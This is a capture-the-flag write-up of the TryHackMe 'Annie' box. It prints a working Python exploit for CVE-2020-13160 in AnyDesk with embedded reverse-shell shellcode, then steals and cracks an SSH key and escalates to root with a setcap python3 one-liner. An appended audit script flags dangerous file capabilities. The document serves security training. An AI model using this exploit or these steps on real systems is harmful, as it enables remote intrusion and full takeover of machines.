Annie From TryHackme

Remote access comes in different flavors.

hac
InfoSec Write-ups


Hello everyone, I am Hac and today we will be doing Annie, which is a “medium” box on TryHackMe. I would rate its difficulty as “easy”, because you just need to find the right port to get an initial foothold. So without wasting any time, let’s get started.

Nmap Scan

root@ip-10-10-98-158:~# sudo nmap -sV -p- 10.10.226.112 -oA nmap --min-rate 1000
Starting Nmap 7.60 ( https://nmap.org ) at 2022-07-06 15:18 BST
Nmap scan report for ip-10-10-226-112.eu-west-1.compute.internal (10.10.226.112)
Host is up (0.00042s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
7070/tcp open ssl/realserver?
40293/tcp open tcpwrapped
MAC Address: 02:39:05:FF:91:67 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.83 seconds

We don’t know much about ports 7070 and 40293, so I did a quick Google search and found that port 7070 is usually used by AnyDesk, which is remote access software.

After that I searched for exploits related to the AnyDesk software. CVE-2020-13160 was the first result in the Google search, so I thought I’d give it a try.

I used this exploit with a small modification (you need to change the IP address as well as the shellcode).

#!/usr/bin/env python
# Python 2 script: here str and bytes are the same type, so chr() and b"" literals concatenate.
import struct
import socket
import sys

ip = 'IP address'  # change this to the target's address
port = 50001       # AnyDesk discovery port (UDP)

def gen_discover_packet(ad_id, os, hn, user, inf, func):
    # Build an AnyDesk discovery datagram; each string field is length-prefixed (big-endian).
    d = chr(0x3e)+chr(0xd1)+chr(0x1)
    d += struct.pack('>I', ad_id)
    d += struct.pack('>I', 0)
    d += chr(0x2)+chr(os)
    d += struct.pack('>I', len(hn)) + hn
    d += struct.pack('>I', len(user)) + user
    d += struct.pack('>I', 0)
    d += struct.pack('>I', len(inf)) + inf
    d += chr(0)
    d += struct.pack('>I', len(func)) + func
    d += chr(0x2)+chr(0xc3)+chr(0x51)
    return d

# change this: regenerate the shellcode for your own listener address and port
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
shellcode = b""
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x63\x40\x04"
shellcode += b"\x9d\x65\x60\xc6\xfb\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x09\x69\x5c\x04\x0f"
shellcode += b"\x62\x99\x91\x62\x1e\x0b\x98\x2d\xf7\x8e\x42"
shellcode += b"\x61\x40\x15\xc1\x6f\x6a\xa4\x65\x32\x08\x8d"
shellcode += b"\x7b\x0f\x70\x9c\x91\x49\x18\x0b\x98\x0f\x63"
shellcode += b"\x98\xb3\x9c\x8e\x6e\xbc\x3d\x6f\xc3\x8e\x95"
shellcode += b"\x2a\x3f\xc5\xfc\x28\x7d\xd4\x01\x29\x6a\xb2"
shellcode += b"\x16\x08\xc6\xa8\x2b\xc9\xe3\xcf\x32\x28\x4f"
shellcode += b"\x1d\x6c\x45\x04\x9d\x65\x60\xc6\xfb"

print('sending payload ...')
# The hostname and user fields carry the format-string payload that triggers CVE-2020-13160.
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # discovery traffic is UDP
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')

I was wondering about port 50001. We had not found this port in our nmap scan; I ran nmap twice but had no luck with it. Then I ran an nmap UDP scan and found that port (the exploit sends a UDP datagram, so a TCP-only scan will not show it).

Let’s run our exploit. Make sure that you have made the proper changes in your exploit script and that your netcat listener is running.

And boom, I got a shell…

After that I copied the contents of /home/annie/.ssh/id_rsa to my local machine. I tried to log in, but the key requires a passphrase, which we don’t have. I used ssh2john to convert the key into a hash that John the Ripper can work on.

Then I cracked that hash with John.

Now we can SSH into the box (make sure the id_rsa file has the proper permissions: chmod 600).

It’s time to escalate our privileges to the root user…

We can use setcap to grant a capability to a binary we control and escalate our privileges to root.

Steps to get root :-

1:- Copy python3 to /tmp or any other directory (the commands below assume you are in /tmp).

cp /usr/bin/python3 .

2:- Enable the cap_setuid capability on the copy.

$ /sbin/setcap cap_setuid+ep /tmp/python3

3:- Run the copied python3, which can now switch to uid 0.

$ ./python3 -c "import os;os.setuid(0);os.system('/bin/bash')"

And we finally got a shell as the root user!
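As an added defender-side check (not part of the original write-up): the escalation above only works because a copy of the interpreter ends up carrying cap_setuid. This POSIX shell script parses `getcap -r /` output and flags binaries whose file capabilities are enough to reach root, so such copies can be found and the capability removed with `setcap -r`. The sample getcap output is constructed, not captured from the box, and paths are assumed to contain no spaces.

```shell
#!/bin/sh
# Audit file capabilities for ones that let an unprivileged user gain root.
# Reads `getcap -r /` output on stdin and prints only the dangerous entries.
# Both libcap output styles are handled:
#   /usr/bin/ping = cap_net_raw+ep      (older libcap)
#   /usr/bin/ping cap_net_raw=ep        (libcap >= 2.41)
# Assumption: file paths contain no spaces.

# Capabilities that on their own are enough to become uid 0 or read any file.
DANGEROUS_CAPS='cap_setuid cap_setgid cap_sys_admin cap_dac_override cap_dac_read_search cap_sys_ptrace cap_sys_module cap_setfcap'

# Constructed sample output (not captured from the Annie box).
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/tmp/python3 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/tool cap_sys_admin,cap_dac_override=ep'

# flag_dangerous_caps: getcap lines on stdin -> flagged lines on stdout
flag_dangerous_caps() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    path=${line%% *}        # first field is the file path
    caps=${line#"$path"}    # remainder is the capability set
    for cap in $DANGEROUS_CAPS; do
      case "$caps" in
        *"$cap"*) printf '%s\n' "$line"; break ;;
      esac
    done
  done
}

# count_flagged: lines on stdin -> line count (no wc padding differences)
count_flagged() {
  n=0
  while IFS= read -r dummy; do n=$((n + 1)); done
  echo "$n"
}

if [ "${1-}" = "--live" ] && command -v getcap >/dev/null 2>&1; then
  # Live audit; remediate a finding with: setcap -r /path/to/binary
  getcap -r / 2>/dev/null | flag_dangerous_caps
else
  printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
fi
```

Run it with `--live` as root on a host to audit the real filesystem; without the flag it only processes the embedded sample.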

I hope you liked this write-up. If you have any questions you can ask me on Twitter: https://twitter.com/Hac10101
